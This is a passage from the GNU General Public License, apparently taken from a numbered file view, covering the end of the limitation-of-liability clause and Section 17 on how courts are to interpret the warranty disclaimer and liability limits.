MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE 653 | TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR 654 | CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE 655 | THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA 656 | BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 657 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 658 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED 659 | OF THE POSSIBILITY OF SUCH DAMAGES. 660 | 661 | 17. Interpretation of Sections 15 and 16. 662 | 663 | If the disclaimer of warranty and limitation of liability 664 | provided above cannot be given local legal effect according to 665 | their terms, reviewing courts shall apply local law that most 666 | closely approximates an absolute waiver of all civil liability 667 | in connection with the Program, unless a warranty or assumption 668 | of liability accompanies a copy of the Program in return for a fee. 669 | 670 | --------------------------------------------------------------------------------